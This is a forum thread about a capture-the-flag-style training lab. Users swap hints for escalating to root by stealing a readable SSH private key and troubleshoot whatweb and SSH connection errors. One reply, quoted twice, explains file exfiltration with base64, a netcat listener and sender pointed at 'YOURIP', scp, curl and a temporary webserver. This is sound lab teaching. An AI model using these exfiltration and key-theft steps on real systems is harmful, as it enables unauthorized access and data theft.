Module - Getting Started - Privilege Escalation - Second question

Hello all. I have been stuck on the following question in the getting started module for a bit and figured it is time to reach out and see if anyone can shine some light on this for me. Here is the question.

" Once you gain access to ‘user2’, try to find a way to escalate your privileges to root, to get the flag in ‘/root/flag.txt’. "

Anyone that has completed this module - could you post a hint / maybe point to a section inside the module that the answer is in relation to?

I don’t know if you passed this question, but I suggest looking for ssh keys.

Type your comment> @elementz1 said:

I don’t know if you passed this question, but I suggest looking for ssh keys.

any tips for the seconds question? I have cheecked the .ssh folder but I don’t have the permission to read the keys

I resolved it… just enumerate the target machine and look at ssh keys

Hello everyone. I am still struggling a bit with this. At this point it feels like I am missing something obvious. I am able to grab the .ssh key ( I am just copy and pasting it from the target machine and into a new document on the client machine ). Once I have that I try to SSH into the same target using

ssh user@server -i /path/to/mykey

but I am unable to get in. It always asks for a password. Ive tried user user1 user2 and root as the username but no luck. Any tips are appreciated.

@NewHax said:

Hello everyone. I am still struggling a bit with this. At this point it feels like I am missing something obvious. I am able to grab the .ssh key ( I am just copy and pasting it from the target machine and into a new document on the client machine ). Once I have that I try to SSH into the same target using

ssh user@server -i /path/to/mykey

but I am unable to get in. It always asks for a password. Ive tried user user1 user2 and root as the username but no luck. Any tips are appreciated.

Before it asks for a password does it say the permissions are incorrect?

@TazWake

I do not receive an issue about permissions (I took note of the hint to chmod the id_rsa).

I do receive an error that says ‘invalid format’ though.

I am running the following command

ssh user@ip_of_target -p portnumber -i /path/to/my/id_rsa

@NewHax said:

@TazWake

I do not receive an issue about permissions (I took note of the hint to chmod the id_rsa).

I do receive an error that says ‘invalid format’ though.

I am running the following command

ssh user@ip_of_target -p portnumber -i /path/to/my/id_rsa

Ok - so the first things to consider.

If the remote server is asking for a password, then your key isn’t working. If your system is asking for the password, then it is a password protected key.

So if your key isn’t working, you need to check what could be causing that.

  • try file /path/to/your/id_rsa
  • try cat /path/to/your/id_rsa to make sure it is the same file and no extra characters appeared
  • try comparing filesize and word count (wc -l) to make sure the files are identical.

@TazWake

Taz - Thank you so damn much. You not only pointed me in the right direction but gave me insight into how to view the problem to find the right solution. I was finally able to complete this with your help.

wc -l saved the day.

The issue I was having was when copy and pasting it was taking 37 lines of text and not the desired 38. I had to manually input a blank line at the end of my key to get this to 38.

Is there a more proper / accurate way to copy and paste files instead of using ’ cat filename ’ and just highlighting and copy and pasting from terminal?

@NewHax said:

@TazWake

Taz - Thank you so damn much.

Always glad to help.

Is there a more proper / accurate way to copy and paste files instead of using ’ cat filename ’ and just highlighting and copy and pasting from terminal?

The short answer is “it depends.”

You can exfiltrate files from Linux systems in a range of ways.

For example : cat filename | base64 copy the output and on your own machine cat (paste) | base64 -d > filename and you get a good recreation of the file.

You can also use netcat to sling the file:

  • first check the file md5sum filename
  • listener on your machine nc -nklvp 12345 > filename
  • send the data on the remote machine nc YOURIP 12345 < filename
  • wait a while, kill the listener (not the remote one as that can kill your shell)
  • check the file on your machine md5sum filename - see if it matches, if it does, win.

If you have SSH access - scp works. You can get more esoteric with curl posting the data or spinning up a temporary webserver on the victim and grabbing it that way.

Linux gives you a range of options - it often depends on what will work at the time.

Type your comment> @TazWake said:

@NewHax said:

@TazWake

Taz - Thank you so damn much.

Always glad to help.

Is there a more proper / accurate way to copy and paste files instead of using ’ cat filename ’ and just highlighting and copy and pasting from terminal?

The short answer is “it depends.”

You can exfiltrate files from Linux systems in a range of ways.

For example : cat filename | base64 copy the output and on your own machine cat (paste) | base64 -d > filename and you get a good recreation of the file.

You can also use netcat to sling the file:

  • first check the file md5sum filename
  • listener on your machine nc -nklvp 12345 > filename
  • send the data on the remote machine nc YOURIP 12345 < filename
  • wait a while, kill the listener (not the remote one as that can kill your shell)
  • check the file on your machine md5sum filename - see if it matches, if it does, win.

If you have SSH access - scp works. You can get more esoteric with curl posting the data or spinning up a temporary webserver on the victim and grabbing it that way.

Linux gives you a range of options - it often depends on what will work at the time.

@TazWake You are an impressive writer i always read your comments for more related details once i finish a problem…zzzzzzzzzzzzzz :wink:

When i am trying to go to nibbleblog through whatweb it shows --"ERROR Opening: http://i.p./nibbleblog/ - Net::ReadTimeout " Error and does not load the required Webpage …can anyone help…

Type your comment> @SPARTANone17 said:

When i am trying to go to nibbleblog through whatweb it shows --"ERROR Opening: http://i.p./nibbleblog/ - Net::ReadTimeout " Error and does not load the required Webpage …can anyone help…

What command did you use? Have you changed the error message to hide the IP, or are you passing http://i.p./nibbleblog/ as the host to whatweb?

Type your comment> @PoirsLJpHY said:

Type your comment> @SPARTANone17 said:

When i am trying to go to nibbleblog through whatweb it shows --"ERROR Opening: http://i.p./nibbleblog/ - Net::ReadTimeout " Error and does not load the required Webpage …can anyone help…

What command did you use? Have you changed the error message to hide the IP, or are you passing http://i.p./nibbleblog/ as the host to whatweb?

Type your comment> @SPARTANone17 said:

Type your comment> @PoirsLJpHY said:

Type your comment> @SPARTANone17 said:

When i am trying to go to nibbleblog through whatweb it shows --"ERROR Opening: http://i.p./nibbleblog/ - Net::ReadTimeout " Error and does not load the required Webpage …can anyone help…

What command did you use? Have you changed the error message to hide the IP, or are you passing http://i.p./nibbleblog/ as the host to whatweb?

You need to provide the real ip or hostname to whatweb, “ip” is just a placeholder. I’m also not sure that you need to provide the http:// prefix or the /nibbleblog/ suffix when using whatweb. So if the IP address of your target was 10.10.10.10, you could use the following command :

whatweb 10.10.10.10

Here is the help page for whatweb, with a usage example at the bottom : WhatWeb | Penetration Testing Tools

Let me know if you manage to get it working, best of luck!

Type your comment> @PoirsLJpHY said:

Type your comment> @SPARTANone17 said:

Type your comment> @PoirsLJpHY said:

Type your comment> @SPARTANone17 said:

When i am trying to go to nibbleblog through whatweb it shows --"ERROR Opening: http://i.p./nibbleblog/ - Net::ReadTimeout " Error and does not load the required Webpage …can anyone help…

What command did you use? Have you changed the error message to hide the IP, or are you passing http://i.p./nibbleblog/ as the host to whatweb?

You need to provide the real ip or hostname to whatweb, “ip” is just a placeholder. I’m also not sure that you need to provide the http:// prefix or the /nibbleblog/ suffix when using whatweb. So if the IP address of your target was 10.10.10.10, you could use the following command :

whatweb 10.10.10.10

Here is the help page for whatweb, with a usage example at the bottom : WhatWeb | Penetration Testing Tools

Let me know if you manage to get it working, best of luck!

No i was using the IP address of the server in place of ip. I was just showing you the syntak earlier. say the ip of server was for example 10.10.10.121 then i used the command whatweb http://10.10.10.121/nibbleblog/
but that was showing error to me…

Type your comment> @SPARTANone17 said:

Type your comment> @PoirsLJpHY said:

Type your comment> @SPARTANone17 said:

Type your comment> @PoirsLJpHY said:

Type your comment> @SPARTANone17 said:

When i am trying to go to nibbleblog through whatweb it shows --"ERROR Opening: http://i.p./nibbleblog/ - Net::ReadTimeout " Error and does not load the required Webpage …can anyone help…

What command did you use? Have you changed the error message to hide the IP, or are you passing http://i.p./nibbleblog/ as the host to whatweb?

You need to provide the real ip or hostname to whatweb, “ip” is just a placeholder. I’m also not sure that you need to provide the http:// prefix or the /nibbleblog/ suffix when using whatweb. So if the IP address of your target was 10.10.10.10, you could use the following command :

whatweb 10.10.10.10

Here is the help page for whatweb, with a usage example at the bottom : WhatWeb | Penetration Testing Tools

Let me know if you manage to get it working, best of luck!

No i was using the IP address of the server in place of ip. I was just showing you the syntak earlier. say the ip of server was for example 10.10.10.121 then i used the command whatweb http://10.10.10.121/nibbleblog/
but that was showing error to me…

Ah, apologies. In that case the command looks correct. Try using whatweb with a site you know to be accessible - e.g. www.google.com. If that works, it is probably worth double checking that the machine you’re running the command from is correctly connected to the VPN, and that the target machine is up.

In this specific case, you already have quite a lot of information on what technologies the target is running - you know, for example, that they are using nibbleblog.

@PoirsLJpHY
I think Sometimes the Kali machiene loses connection in between or something like that because when i try to use the PWN box it works fine i was able to clear task easily Or maybe there would have been an error by my side…

@TazWake
Since user2 had read access over root’s .ssh, I copied the id_rsa from there to a folder under user2, changed the permission too, but whenever I try to ssh to the server as root, I’m getting ‘Connection timeout’ error. Any idea on this?

user2@gettingstartedprivesc-145098-56f547cbb6-sx4r2:~$ ssh -p 31958 root@178.62.61.23 -i id_rsa
ssh: connect to host 178.62.61.23 port 31958: Connection timed out

Here’s the error, I tried all the users i.e., user1, user2, root. All giving same errors.

Type your comment> @SushWannaHack said:

@TazWake
Since user2 had read access over root’s .ssh, I copied the id_rsa from there to a folder under user2, changed the permission too, but whenever I try to ssh to the server as root, I’m getting ‘Connection timeout’ error. Any idea on this?

user2@gettingstartedprivesc-145098-56f547cbb6-sx4r2:~$ ssh -p 31958 root@178.62.61.23 -i id_rsa
ssh: connect to host 178.62.61.23 port 31958: Connection timed out

Here’s the error, I tried all the users i.e., user1, user2, root. All giving same errors.

It implies there isn’t a route to 178.62.61.23 - are you sure that is the correct IP address?

The error implies a networking issue. If you are confident the IP and port are correct, it would be worth troubleshooting with traceroute and maybe even nmap.